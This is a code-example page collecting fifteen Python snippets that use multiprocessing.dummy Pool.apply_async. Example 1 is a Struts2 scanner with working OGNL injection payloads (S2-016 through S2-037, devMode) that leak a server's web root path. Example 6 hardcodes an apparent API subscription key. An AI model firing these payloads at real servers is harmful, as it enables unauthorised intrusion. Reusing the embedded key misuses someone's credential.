This article collects typical usage examples of the Python method multiprocessing.dummy.Pool.apply_async. If you have been wondering what Pool.apply_async does, how it is used, or what it looks like in real code, the curated examples below should help. You can also explore further usage of the enclosing class, multiprocessing.dummy.Pool.
Below are 15 code examples of Pool.apply_async, ordered by popularity by default. You can upvote the examples you like or find useful; your ratings help the system recommend better Python code examples.
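Before diving into the examples, here is a minimal, self-contained sketch of the method itself: multiprocessing.dummy exposes the Pool API backed by threads rather than processes, and apply_async submits one call to the pool and immediately returns an AsyncResult whose get() yields the function's return value.

from multiprocessing.dummy import Pool  # thread-backed Pool with the multiprocessing API

def square(x):
    return x * x

pool = Pool(4)                               # four worker threads
async_result = pool.apply_async(square, (7,))
print(async_result.get(timeout=5))           # -> 49
pool.close()
pool.join()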
Example 1: check_struct
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def check_struct(url):
    global types
    global isvul
    isvul = False
    types = []
    payloads = []
    s2_16payload = r'redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%22dir%3A%22%2B%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'
    s2_19payload = r'debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()'
    s2_32payload = r'method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.print(%23path),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8&web=web&path=path%3a'
    s2_33payload = r'/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23parameters.content[0]),%23wr.close(),xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=shuaida'
    s2_37payload = r'/%28%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23wr.println(%23parameters.content[0]),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=shuaida'
    s2_devmode_payload = r'debug=browser&object=(%23mem=%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS),%23a%3d%23parameters.reqobj[0],%23c%3d%23parameters.reqobj[1],%23req%3d%23context.get(%23a),%23b%3d%23req.getRealPath(%23c),%23hh%3d%23context.get(%23parameters.rpsobj[0]),%23hh.getWriter().println(%23parameters.content[0]),%23hh.getWriter().println(%23b),%23hh.getWriter().flush(),%23hh.getWriter().close(),1?%23xx:%23request.toString&reqobj=com.opensymphony.xwork2.dispatcher.HttpServletRequest&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&reqobj=%2f&reqobj=111&content=devMode dir--***'
    payloads.append(setPayload(s2_16payload, 's2_16payload'))
    payloads.append(setPayload(s2_19payload, 's2_19payload'))
    payloads.append(setPayload(s2_32payload, 's2_32payload'))
    payloads.append(setPayload(s2_33payload, 's2_33payload'))
    payloads.append(setPayload(s2_37payload, 's2_37payload'))
    payloads.append(setPayload(s2_devmode_payload, 's2_devmode_payload'))
    pool = Pool(6)
    for payload in payloads:
        pool.apply_async(func=url_request, args=(url, payload), callback=callback)
    pool.close()
    pool.join()
    if isvul:
        lock.acquire()
        fileSave(url, types)
        vulnerabilitys.append('[+]%s vulnerability exists %s!' % (url.strip(), ','.join(types)))
        lock.release()
    types = []
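Example 1 collects results through the callback argument: each time a payload check finishes, the pool invokes the callback with the worker's return value. A stripped-down sketch of that pattern (check and handle are illustrative names, not part of the example above):

from multiprocessing.dummy import Pool

results = []

def handle(result):
    # runs in the pool's result-handler thread as each task finishes
    results.append(result)

def check(item):
    return item * 2  # stand-in for the real work, e.g. url_request

pool = Pool(6)
for item in range(6):
    pool.apply_async(check, args=(item,), callback=handle)
pool.close()
pool.join()  # after join(), all callbacks have run
print(sorted(results))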
Example 2: main
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def main():
    n = 1000000
    m = 1
    m2 = 10000
    m3 = 100
    create_db()
    pool = Pool(processes=5)
    start = time.time()
    fill(n)
    fill_time = time.time() - start
    print('{} inserts in {}s'.format(n, fill_time))
    start = time.time()
    results = []
    for _ in range(m):
        results.append(pool.apply_async(read, ()))
        # results.append(pool.apply_async(read_dataset, ()))
    for i in range(m2):
        results.append(pool.apply_async(read_one, ()))
        if i % m3 == 0:
            results.append(pool.apply_async(fill, (1,)))
    for r in results:
        r.get(timeout=1000000)
    read_time = time.time() - start
    pool.terminate()
    print('{}.{} reads in {}s'.format(m, m2, read_time))
Example 3: execute
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def execute(self):
    if pyqt:
        self.assignment.emit(['zones finalized', 0])
    self.aux_res.prepare(self.graph, self.results)
    self.matrix.matrix_view = self.matrix.matrix_view.reshape((self.graph.num_zones, self.graph.num_zones,
                                                               self.results.classes['number']))
    mat = self.matrix.matrix_view
    pool = ThreadPool(self.results.cores)
    all_threads = {'count': 0}
    for orig in self.matrix.index:
        i = int(self.graph.nodes_to_indices[orig])
        if np.nansum(mat[i, :, :]) > 0:
            if self.graph.fs[i] == self.graph.fs[i + 1]:
                self.report.append("Centroid " + str(orig) + " is not connected")
            else:
                pool.apply_async(self.func_assig_thread, args=(orig, all_threads))
                # one_to_all(orig, self.matrix, self.graph, self.results, self.aux_res, 0)
    pool.close()
    pool.join()
    self.results.link_loads = np.sum(self.aux_res.temp_link_loads, axis=2)
    if pyqt:
        self.assignment.emit(['text AoN', "Saving Outputs"])
        self.assignment.emit(['finished_threaded_procedure', None])
Example 4: apply
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def apply(request, company_id):
    user = User.objects.get(email=request.user)
    company = Company.objects.filter(id=company_id)[0]
    if not user.profile or not user.profile.address:
        return HttpResponseRedirect('/profile/')
    if user.num_apps_left_today == 0:
        context = {}
        context['message'] = 'Sorry, you have exceeded max number of apps available per day. We are forced to have a cap because of limited server capabilities.'
        return render(request, 'thankyou.html', context)
    app = Application(user=user, company=company)
    app.save()
    user.num_apps_left_today -= 1
    user.save()
    pool = Pool(processes=1)

    def fill():
        url = random.choice(Client.objects.all()).ip + "fill"
        user_json = UserToJson(UserPlain(user))
        param = {'user': user_json, 'company_name': company.name, 'app_id': app.id}
        r = requests.get(url, params=param)

    pool.apply_async(fill)
    context = {}
    context['message'] = 'Thanks for applying. Our automated system will be filling out your app in the next 10 mins. Check your email for confirmation.'
    if user.num_apps_left_today == daily_allowed_apps - 1:
        context['company'] = company
    return render(request, 'thankyou.html', context)
Example 5: run_client_code
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def run_client_code(self, command):
    env = os.environ.copy()
    env["GOOEY"] = "1"
    print "run command:", command
    p = subprocess.Popen(command, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True, env=env)
    self._process = p
    pool = Pool(1)
    pool.apply_async(self.read_stdout, (p, self.process_result))
Example 6: query
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def query(id1, id2):
    #now = time.time()
    #url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:desc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
    #json1 = json.loads((urllib.urlopen(url)).read())['entities']
    #url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:asc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
    #json2 = json.loads((urllib.urlopen(url)).read())['entities']
    #print 'time use: ', time.time() - now
    #url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=1&attributes=Id,AA.AuId,AA.AfId&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
    #json1 = (json.loads((urllib.urlopen(url)).read()))['entities']
    #url = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=1&attributes=Id,AA.AuId,AA.AfId&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
    #json2 = (json.loads((urllib.urlopen(url)).read()))['entities']
    url1 = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:desc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id1
    url2 = 'https://oxfordhk.azure-api.net/academic/v1.0/evaluate?expr=Composite(AA.AuId=%d)&count=20000&attributes=Id,F.FId,J.JId,C.CId,AA.AuId,AA.AfId&orderby=D:asc&subscription-key=f7cc29509a8443c5b3a5e56b0e38b5a6'%id2
    poolResult = []
    pool = Pool(20)
    poolResult.append(pool.apply_async(lambda url: json.loads((urllib.urlopen(url)).read())['entities'], (url1,)))
    poolResult.append(pool.apply_async(lambda url: json.loads((urllib.urlopen(url)).read())['entities'], (url2,)))
    poolResult.append(pool.apply_async(getPaperJson, (id1, 'RId,F.FId,J.JId,C.CId,AA.AuId,AA.AfId')))
    poolResult.append(pool.apply_async(getPaperJson, (id2, 'F.FId,J.JId,C.CId,AA.AuId,AA.AfId,CC')))
    pool.close()
    #pool.join()
    json1 = poolResult[0].get()
    json2 = poolResult[1].get()
    paperJson1 = poolResult[2].get()
    paperJson2 = poolResult[3].get()
    # print len(json2)
    if json1 and json2:
        #afId1 = -1
        #afId2 = -1
        #for author in json1[0]['AA']:
        #    if author['AuId'] == id1 and author.has_key('AfId'):
        #        afId1 = author['AfId']
        #for author in json2[0]['AA']:
        #    if author['AuId'] == id2 and author.has_key('AfId'):
        #        afId2 = author['AfId']
        #return query_AuId_AuId(id1, id2, afId1, afId2)
        return query_AuId_AuId(id1, id2, json1, json2)
    elif json1:
        #afId1 = -1
        #for author in json1[0]['AA']:
        #    if author['AuId'] == id1 and author.has_key('AfId'):
        #        afId1 = author['AfId']
        #return query_AuId_Id(id1, id2, afId1)
        return query_AuId_Id(id1, id2, json1, paperJson2)
    elif json2:
        #afId2 = -1
        #for author in json2[0]['AA']:
        #    if author['AuId'] == id2 and author.has_key('AfId'):
        #        afId2 = author['AfId']
        #return query_Id_AuId(id1, id2, afId2)
        return query_Id_AuId(id1, id2, paperJson1, json2)
    else:
        if paperJson2.has_key('CC') and paperJson2['CC'] >= 50000:
            return query_Id_Id_big(id1, id2, paperJson1, paperJson2)
        else:
            return query_Id_Id_small(id1, id2, paperJson1, paperJson2)
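One detail worth noting in this example: passing a lambda to apply_async works only because multiprocessing.dummy backs the Pool with threads, so the callable never has to cross a process boundary. A process-backed multiprocessing.Pool must pickle the callable, and lambdas are not picklable. A minimal illustration of the difference:

from multiprocessing.dummy import Pool as ThreadPool

pool = ThreadPool(2)
r = pool.apply_async(lambda x: x + 1, (41,))
print(r.get())  # 42 -- fine, the lambda stays in-process
pool.close()
pool.join()

# from multiprocessing import Pool  # a process-backed pool instead
# Pool(2).apply_async(lambda x: x + 1, (41,)).get()  # fails: lambdas can't be pickled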
Example 7: get_all_content
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def get_all_content(path):
    contents = set()
    pool = ThreadPool(100)
    max_page = get_max_page()
    for x in xrange(1, max_page + 1):
        pool.apply_async(get_content, args=(x, contents))
    pool.close()
    pool.join()
    store(path, contents)
Example 8: get_blog
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def get_blog(path):
    pool = ThreadPool(20)
    url = 'http://www.yinwang.org'
    contents = set()
    for blog_url in get_blog_url(url):
        pool.apply_async(get_content, args=(blog_url, contents))
    pool.close()
    pool.join()
    store(path, contents, 'docs_cn')
Example 9: run
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def run():
    print 'Parent process %s.' % os.getpid()
    p = Pool()
    for i in range(9):
        p.apply_async(long_time_task, args=(i,))
    print 'Waiting for all sub processes done...'
    p.close()
    p.join()
    print 'All sub processes done.'
Example 10: Async_log
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def Async_log(user, url):
    if 'op.baihe.com' in url:
        mysql_op_log = Mysql.mysql_op(user, url)
        Proc = Pool()

        def Run():
            mysql_op_log.op_log()

        Proc.apply_async(Run)
        Proc.close()
        Proc.join()
Example 11: RunClientCode
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def RunClientCode(self, command):
    def doInBackground(process, callback):
        while True:
            line = process.stdout.readline()
            if not line:
                break
            wx.CallAfter(self.core_gui.PublishConsoleMsg, line)
        wx.CallAfter(callback, process)

    p = subprocess.Popen(command, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
    _pool = Pool(1)
    _pool.apply_async(doInBackground, (p, self.HandleResult))
Example 12: AsyncDispatcher
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
class AsyncDispatcher(object):
    """
    Runs blocking calls as asynchronous tasks
    """
    def __init__(self, num_threads=50):
        self.pool = ThreadPool(processes=num_threads)

    def run_as_asynch(self, task, on_success=None, on_error=None, on_complete=None):
        """
        Transforms a blocking call into an asynchronous task
        :param task: a function to run
        :param on_complete: a function to call when the task has finished running.
            Said function should accept the return value of the synchronous task.
        :return:
        """
        def task_wrapper():
            """
            encapsulates tasks to catch their errors,
            as ThreadPool does not provide asynchronous error reporting by default
            """
            try:
                return task()
            except Exception as ex:
                logging.error(traceback.format_exc())
                # report the asynchronous exception:
                if on_error:
                    # call callback on result thread (this is the worker thread)
                    self.pool.apply_async(on_error, args=(ex,))
                # call the completion handler:
                if on_complete:
                    # call callback on result thread (this is the worker thread)
                    self.pool.apply_async(on_complete)
                # re-raise the execution exception so it reaches the get() function
                raise Exception(ex)

        def success_wrapper(result):
            """
            called asynchronously when the task has finished running successfully
            """
            # This handler is called on the result thread,
            # so there is no need to reschedule the callback
            #
            # report success:
            if on_success:
                on_success(result)
            # report that the task is completed
            if on_complete:
                on_complete()

        # run the task on a different thread:
        result = self.pool.apply_async(task_wrapper, callback=success_wrapper)
        return ScheduledTask(result)
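A brief usage sketch of this dispatcher, assuming ScheduledTask simply wraps the returned AsyncResult as the last line suggests; fetch_data and the callbacks are illustrative names, not part of the class above:

import time

dispatcher = AsyncDispatcher(num_threads=4)

def fetch_data():
    time.sleep(1)  # stand-in for a blocking call (I/O, RPC, ...)
    return 'payload'

dispatcher.run_as_asynch(fetch_data,
                         on_success=lambda result: print('got: ' + result),
                         on_error=lambda ex: print('failed: ' + str(ex)))
time.sleep(2)  # give the worker thread time to run the callbacks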
Example 13: aliveRun
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def aliveRun(self, threads, domains):
    if type(domains) == type('a'):
        self.alivescan(domains)
    else:
        pool = Pool(threads)
        for domain in domains:
            pool.apply_async(func=self.alivescan, args=(domain,))
        pool.close()
        pool.join()
    print ''
    return self.results
Example 14: upload_stream
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def upload_stream(self, stream_ref, **kwargs):
    if self.manifest["uploadId"] is None:
        raise RuntimeError('Cannot call upload before initializing an upload using new_upload.')

    # The pool of work we have available, and the semaphore to gate work into the pool (since just submitting
    # work to the pool doesn't block on the number of processes available to do work in the pool)
    pool = Pool(processes=self.parallel_process_count)
    semaphore = Semaphore(self.parallel_process_count)

    # A dict which will be shared between the threads in our pool. This would not work as-is with processes, but
    # we use threads via multiprocessing.dummy; if we used processes, a Manager would likely be needed for this.
    #
    # should_continue will only ever be set to False by _upload_stream_part, so we are not too worried about
    # having multiple writers.
    #
    # The Queue should be thread safe (and for tracking the exceptions, order doesn't strictly matter)
    shared_dict = {'should_continue': True, 'exceptions': Queue()}

    part_counter = 0
    apply_async_kwargs = kwargs.copy()
    apply_async_kwargs['semaphore'] = semaphore
    apply_async_kwargs['shared_dict'] = shared_dict

    # We pull data from the stream until there is no more
    keep_reading = True
    while keep_reading:
        if six.PY3:
            read_bytes = stream_ref.buffer.read(self.part_size)
        else:
            read_bytes = stream_ref.read(self.part_size)
        semaphore.acquire()
        if len(read_bytes) != 0:
            pool.apply_async(self._upload_stream_part, (part_counter, read_bytes), apply_async_kwargs)
            part_counter += 1
        keep_reading = (len(read_bytes) == self.part_size) and shared_dict['should_continue']

    # If we're here, we've either sent off all the work we needed to (and so are waiting on the remaining bits to
    # finish) or we terminated early because of an exception in one of our uploads. In either case, close off the
    # pool to any more work and let the remaining work finish gracefully
    pool.close()
    pool.join()

    # If we had at least one exception, then raise an error to indicate failure
    if not shared_dict['exceptions'].empty():
        raise MultipartUploadError(error_causes_queue=shared_dict['exceptions'])

    # Because we processed in parallel, the parts in the manifest may be out of order. Re-order them based on the
    # part number because commit assumes that they are ordered
    self.manifest['parts'].sort(key=lambda part: part['part_num'])
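The gating idea in this example generalizes well: apply_async itself queues work without bound, so a semaphore that each worker releases when it finishes gives the producer backpressure. A minimal self-contained sketch of that pattern, assuming (as the snippet implies) that the worker releases the semaphore when done; the worker body and chunk data are illustrative:

from multiprocessing.dummy import Pool
from threading import Semaphore

def process_part(part_num, data, semaphore):
    try:
        pass  # do the real work on `data` here (illustrative no-op)
    finally:
        semaphore.release()  # free a slot so the producer can submit more

pool = Pool(processes=4)
gate = Semaphore(4)  # at most 4 parts in flight at once

for part_num, chunk in enumerate([b'x' * 1024] * 20):  # stand-in for stream chunks
    gate.acquire()  # blocks while all 4 workers are busy
    pool.apply_async(process_part, (part_num, chunk, gate))

pool.close()
pool.join()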
Example 15: check_main
# Required import: from multiprocessing.dummy import Pool [as alias]
# Or: from multiprocessing.dummy.Pool import apply_async [as alias]
def check_main(self, xml_file, server):
    # Check whether a file has been selected
    if self.filename == '':
        self.lb.config(text="Please select the index.xml file first")
    else:
        self.lfc_field_1_t.insert(END, 'Start [%s]\n' % xml_file, 'blue')
        self.lfc_field_1_t.insert(END, '========================================================================================================================\n')
        self.lfc_field_1_t.update()
        component_num = set()
        url_num = 0
        # Check whether the ini configuration file exists
        if os.path.isfile(server):
            tree = ET.ElementTree(file=xml_file)
            iau_url = ''
            # Use a thread pool; otherwise the packaged exe tends to fail under heavy IO
            async_pool = ThreadPool(100)
            for product in tree.findall('products'):
                pid = 'c' + product.attrib['class'] + 't' + product.attrib['type'] + 'v' + product.attrib['ver'] + 'l' + product.attrib['lang'] + 'p' + product.attrib['plat'] + 'r' + product.attrib['region'] + 'o' + product.attrib['oem']
                p = re.compile(r'%s$' % pid)
                with open(server, 'r') as f:
                    for line in f.readlines():
                        if re.search(p, line.strip()):
                            iau_url = line.strip()
                            url_num += 1
                            break
                if iau_url == '':
                    self.lfc_field_1_t.insert(END, 'The URL for %s was not found in the ini configuration file; please check the configuration!\n' % pid, 'red')
                    self.lfc_field_1_t.update()
                else:
                    component_list = set()
                    # .//entity searches for all entity elements under the current products node
                    for entity in product.findall('.//entity'):
                        component = entity.attrib['name']
                        component_num.add(component)
                        component_list.add(component)
                    async_pool.apply_async(self.iau_check, (component_list, iau_url))
            async_pool.close()
            async_pool.join()
        else:
            self.lfc_field_1_t.insert(END, 'Configuration file %s not found; please make sure it is in the same directory as the exe!\n' % server, 'red')
            self.lfc_field_1_t.update()
        self.lfc_field_1_t.insert(END, '========================================================================================================================\n')
        self.lfc_field_1_t.insert(END, 'End [%s]\n' % xml_file, 'blue')
        self.lfc_field_1_t.insert(END, '---- This AU involves %s components and %s products\n' % (len(component_num), url_num), 'blue')
        self.lfc_field_1_t.insert(END, '---- Pass: %s\n' % self.pass_num, 'blue')
        self.lfc_field_1_t.insert(END, '---- Fail: %s\n\n' % self.fail_num, 'blue')
        self.pass_num = 0
        self.fail_num = 0
        self.lfc_field_1_t.update()
        self.lfc_field_1_t.see(END)